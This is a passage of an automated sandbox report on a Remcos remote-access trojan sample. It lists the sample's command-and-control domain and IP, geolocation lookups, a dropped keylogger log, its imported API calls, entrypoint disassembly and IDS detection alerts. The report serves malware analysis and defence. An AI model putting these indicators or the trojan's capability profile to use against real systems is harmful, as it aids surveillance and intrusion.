                              http://geoplugin.net/json.gpfalse
                                		high
                                juanosorio.loseyourip.comtrue
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://geoplugin.net/json.gpc1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.0000000000671000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://geoplugin.net/json.gpx1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.0000000000671000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://geoplugin.net/json.gpu1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.0000000000671000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://geoplugin.net/json.gp/C1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exefalse
                                        		high
                                        http://geoplugin.net/json.gpn.net/1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://geoplugin.net/WZ1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.0000000000692000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            179.15.136.6
                                            		juanosorio.loseyourip.comColombia
                                            		27831ColombiaMovilCOtrue
                                            178.237.33.50
                                            		geoplugin.netNetherlands
                                            		8455ATOM86-ASATOM86NLfalse

                                            General Information

                                            Joe Sandbox version:42.0.0 Malachite
                                            Analysis ID:1587333
                                            Start date and time:2025-01-10 07:49:12 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 6m 52s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:8
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe
                                            Detection:MAL
                                            Classification:mal100.rans.troj.spyw.expl.evad.winEXE@1/2@2/2
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 37
                                            • Number of non-executed functions: 206
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Override analysis time to 240s for sample files taking high CPU consumption

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            03:03:31API Interceptor8139063x Sleep call for process: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            179.15.136.6173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                              1736348224ad77cf86e491faad27e4b5decf1eb0bb26f16b0527e5ef488389ba353aa3db79582.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                  1736348224f7603a5c535b2b2f6cc29730626d73a967c67551d2d14f73b547fe7b5fc10393994.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    1736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                      17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        178.237.33.50Material Requirments.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                        • geoplugin.net/json.gp
                                                        preliminary drawing.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                        • geoplugin.net/json.gp
                                                        DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                        • geoplugin.net/json.gp
                                                        z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • geoplugin.net/json.gp
                                                        173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • geoplugin.net/json.gp
                                                        1736348224ad77cf86e491faad27e4b5decf1eb0bb26f16b0527e5ef488389ba353aa3db79582.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • geoplugin.net/json.gp
                                                        17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • geoplugin.net/json.gp
                                                        1736348224f7603a5c535b2b2f6cc29730626d73a967c67551d2d14f73b547fe7b5fc10393994.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • geoplugin.net/json.gp
                                                        1736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • geoplugin.net/json.gp
                                                        17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • geoplugin.net/json.gp

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        geoplugin.netMaterial Requirments.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                        • 178.237.33.50
                                                        preliminary drawing.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                        • 178.237.33.50
                                                        DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 178.237.33.50
                                                        173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        1736348224ad77cf86e491faad27e4b5decf1eb0bb26f16b0527e5ef488389ba353aa3db79582.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        1736348224f7603a5c535b2b2f6cc29730626d73a967c67551d2d14f73b547fe7b5fc10393994.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        1736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        ATOM86-ASATOM86NLMaterial Requirments.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                        • 178.237.33.50
                                                        preliminary drawing.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                        • 178.237.33.50
                                                        DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 178.237.33.50
                                                        173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        1736348224ad77cf86e491faad27e4b5decf1eb0bb26f16b0527e5ef488389ba353aa3db79582.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        1736348224f7603a5c535b2b2f6cc29730626d73a967c67551d2d14f73b547fe7b5fc10393994.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        1736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        ColombiaMovilCO6.elfGet hashmaliciousUnknownBrowse
                                                        • 181.70.170.80
                                                        173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 179.15.136.6
                                                        1736348224ad77cf86e491faad27e4b5decf1eb0bb26f16b0527e5ef488389ba353aa3db79582.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 179.15.136.6
                                                        17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 179.15.136.6
                                                        1736348224f7603a5c535b2b2f6cc29730626d73a967c67551d2d14f73b547fe7b5fc10393994.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 179.15.136.6
                                                        1736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 179.15.136.6
                                                        17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 179.15.136.6
                                                        sh4.elfGet hashmaliciousMiraiBrowse
                                                        • 177.252.126.19
                                                        armv5l.elfGet hashmaliciousUnknownBrowse
                                                        • 191.93.155.250
                                                        Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                                        • 179.12.199.43

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\ProgramData\remcos\logs.dat

                                                        Download File
                                                        Process:C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):144
                                                        Entropy (8bit):3.3319169319867985
                                                        Encrypted:false
                                                        SSDEEP:3:rglsOlfVlOA4ql55JWRal2Jl+7R0DAlBG45klovDl6v:Mls6yql55YcIeeDAlOWAv
                                                        MD5:CB7983E197CABD7C201A6CC24DEE191B
                                                        SHA1:D33FAA2EDBE5E96423F9942F161DB6C2C82B7C30
                                                        SHA-256:D59DE7C2A25A34A3AF0734BA0AEF126FDB7DA6A9FEAABEFA5560B104D0C27F64
                                                        SHA-512:0B5856BDB05FEE11873984D26DDDF0BAF3B0AD342406A66E2AE054F28A48E89BFA9EC3FF03695B459657AEAD8B0294157FC42D7983A5E89A5CFF2A78E4F70C18
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                        Reputation:low
                                                        Preview:....[.2.0.2.5./.0.1./.1.0. .0.1.:.5.0.:.1.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json

                                                        Download File
                                                        Process:C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):963
                                                        Entropy (8bit):5.019205124979377
                                                        Encrypted:false
                                                        SSDEEP:12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlupdVauKyGX85jvXhNlT3/7AcV9Wro
                                                        MD5:B62617530A8532F9AECAA939B6AB93BB
                                                        SHA1:E4DE9E9838052597EB2A5B363654C737BA1E6A66
                                                        SHA-256:508F952EF83C41861ECD44FB821F7BB73535BFF89F54D54C3549127DCA004E70
                                                        SHA-512:A0B385593B721313130CF14182F3B6EE5FF29D2A36FED99139FA2EE838002DFEEC83285DEDEAE437A53D053FCC631AEAD001D3E804386211BBA2F174134EA70D
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):6.589339009830499
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe
                                                        File size:493'568 bytes
                                                        MD5:90bf80022402e68248981833dcfacde0
                                                        SHA1:60b5b5973c52ed76af313681a6c24f264b88a3b4
                                                        SHA256:be4f15c4e0df6828dfcb3b91b22e77558bd02cb49afdd6089ff846651c5c6e98
                                                        SHA512:354d85990fe5fc45929f4f1a13d18de20004f4387708526b62533c8af2a30df1763e4f27e73e9566f8373915430045849bf5d36856142fbae4f4c60abded2225
                                                        SSDEEP:12288:913ak/mBXTG4/1v08KI7ZnMEF76JqmsvZQwS:Xak/mBXTV/R0nEF76gFZH
                                                        TLSH:7BA4BF01BAD2C072D57654300C3AE775DEBDBD212839897BB3D61D97FD30190A63AAB2
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)...H...H...H....(..H....*..H....+..H...0]..H..&....H... ...H... ...H... ...H...0J..H...H...I...!...H...!&..H...!...H..Rich.H.

                                                        File Icon

                                                        Icon Hash:95694d05214c1b33

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x433d45
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x677C5D61 [Mon Jan 6 22:46:57 2025 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:1
                                                        File Version Major:5
                                                        File Version Minor:1
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:1
                                                        Import Hash:e77512f955eaf60ccff45e02d69234de

                                                        Entrypoint Preview

                                                        Instruction
                                                        call 00007F345CCBE628h
                                                        jmp 00007F345CCBDF7Fh
                                                        push ebp
                                                        mov ebp, esp
                                                        sub esp, 00000324h
                                                        push ebx
                                                        push 00000017h
                                                        call 00007F345CCE045Eh
                                                        test eax, eax
                                                        je 00007F345CCBE107h
                                                        mov ecx, dword ptr [ebp+08h]
                                                        int 29h
                                                        push 00000003h
                                                        call 00007F345CCBE2C4h
                                                        mov dword ptr [esp], 000002CCh
                                                        lea eax, dword ptr [ebp-00000324h]
                                                        push 00000000h
                                                        push eax
                                                        call 00007F345CCC05E0h
                                                        add esp, 0Ch
                                                        mov dword ptr [ebp-00000274h], eax
                                                        mov dword ptr [ebp-00000278h], ecx
                                                        mov dword ptr [ebp-0000027Ch], edx
                                                        mov dword ptr [ebp-00000280h], ebx
                                                        mov dword ptr [ebp-00000284h], esi
                                                        mov dword ptr [ebp-00000288h], edi
                                                        mov word ptr [ebp-0000025Ch], ss
                                                        mov word ptr [ebp-00000268h], cs
                                                        mov word ptr [ebp-0000028Ch], ds
                                                        mov word ptr [ebp-00000290h], es
                                                        mov word ptr [ebp-00000294h], fs
                                                        mov word ptr [ebp-00000298h], gs
                                                        pushfd
                                                        pop dword ptr [ebp-00000264h]
                                                        mov eax, dword ptr [ebp+04h]
                                                        mov dword ptr [ebp-0000026Ch], eax
                                                        lea eax, dword ptr [ebp+04h]
                                                        mov dword ptr [ebp-00000260h], eax
                                                        mov dword ptr [ebp-00000324h], 00010001h
                                                        mov eax, dword ptr [eax-04h]
                                                        push 00000050h
                                                        mov dword ptr [ebp-00000270h], eax
                                                        lea eax, dword ptr [ebp-58h]
                                                        push 00000000h
                                                        push eax
                                                        call 00007F345CCC0556h

                                                        Rich Headers

                                                        Programming Language:
                                                        • [C++] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x6f0300x104.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x770000x4ad8.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x7c0000x3b9c.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x6d5200x38.rdata
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x6d5f80x18.rdata
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x6d5580x40.rdata
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x580000x4f4.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x5612d0x562005c74fad187ce0ec180ec04ec1b2886ccFalse0.5738587400217707data6.626093338563234IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x580000x18b100x18c006a99ef6306230cc107eebd633ea523feFalse0.49747474747474746data5.749671721823548IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0x710000x5d940xe00f36050cd29c9ed45c5f5146a79631724False0.22712053571428573data3.113812036269812IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x770000x4ad80x4c001658a70b29f2390ac934182ba33739b1False0.27765213815789475data3.979462869242048IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x7c0000x3b9c0x3c001ed637208bbcc0435870762eae94c19aFalse0.759375data6.709901047445024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0x7718c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3421985815602837
                                                        RT_ICON0x775f40x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.27704918032786885
                                                        RT_ICON0x77f7c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.23686679174484052
                                                        RT_ICON0x790240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.22977178423236513
                                                        RT_RCDATA0x7b5cc0x4cadata1.0089722675367048
                                                        RT_GROUP_ICON0x7ba980x3edataEnglishUnited States0.8064516129032258

                                                        Imports

                                                        DLLImport
                                                        KERNEL32.dllExpandEnvironmentStringsA, GetLongPathNameW, CopyFileW, GetLocaleInfoA, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, LoadLibraryA, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, OpenMutexA, lstrcatW, GetCurrentProcessId, GetTempFileNameW, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, QueryDosDeviceW, FindFirstVolumeW, GetConsoleScreenBufferInfo, SetConsoleTextAttribute, lstrlenW, GetStdHandle, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FindVolumeClose, GetVolumePathNamesForVolumeNameW, lstrcpyW, SetConsoleOutputCP, FormatMessageA, FindFirstFileA, AllocConsole, lstrcmpW, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindFirstFileExA, HeapReAlloc, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, GetACP, GetModuleHandleExW, MoveFileExW, LoadLibraryExW, RaiseException, RtlUnwind, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, MultiByteToWideChar, DecodePointer, EncodePointer, TlsFree, TlsSetValue, GetFileSize, TerminateThread, GetLastError, GetModuleHandleA, RemoveDirectoryW, MoveFileW, SetFilePointerEx, CreateDirectoryW, GetLogicalDriveStringsA, DeleteFileW, FindNextFileA, DeleteFileA, SetFileAttributesW, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, GetModuleHandleW, ExitProcess, GetProcAddress, CreateMutexA, GetCurrentProcess, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, FindNextVolumeW, TlsGetValue, TlsAlloc, SwitchToThread, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, WaitForSingleObjectEx, ResetEvent, InitializeCriticalSectionAndSpinCount, SetEndOfFile
                                                        USER32.dllDefWindowProcA, TranslateMessage, DispatchMessageA, GetMessageA, GetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, CallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, GetWindowThreadProcessId, SetForegroundWindow, SetClipboardData, EnumWindows, ExitWindowsEx, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible, CreateWindowExA, SendInput, EnumDisplaySettingsW, mouse_event, MapVirtualKeyA, TrackPopupMenu, CreatePopupMenu, AppendMenuA, RegisterClassExA, GetCursorPos, SystemParametersInfoW, GetIconInfo, GetSystemMetrics, CloseWindow, DrawIcon
                                                        GDI32.dllBitBlt, CreateCompatibleBitmap, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteDC, DeleteObject, CreateDCA, GetObjectA, SelectObject
                                                        ADVAPI32.dllLookupPrivilegeValueA, CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, RegDeleteKeyA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW
                                                        SHELL32.dllShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW
                                                        ole32.dllCoInitializeEx, CoGetObject, CoUninitialize
                                                        SHLWAPI.dllStrToIntA, PathFileExistsW, PathFileExistsA
                                                        WINMM.dllmciSendStringA, mciSendStringW, waveInClose, waveInStop, waveInStart, waveInUnprepareHeader, waveInOpen, waveInAddBuffer, waveInPrepareHeader, PlaySoundW
                                                        WS2_32.dllsend, WSAStartup, socket, connect, WSAGetLastError, recv, closesocket, inet_ntoa, htons, htonl, getservbyname, ntohs, getservbyport, gethostbyaddr, inet_addr, WSASetLastError, gethostbyname
                                                        urlmon.dllURLOpenBlockingStreamW, URLDownloadToFileW
                                                        gdiplus.dllGdipAlloc, GdiplusStartup, GdipGetImageEncoders, GdipLoadImageFromStream, GdipSaveImageToStream, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipCloneImage
                                                        WININET.dllInternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2025-01-10T07:50:16.779873+01002834937ETPRO MALWARE Observed DNS Query to Abused DDNS (loseyourip .com)1192.168.2.7529071.1.1.153UDP
                                                        2025-01-10T07:50:17.643480+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749704179.15.136.61997TCP
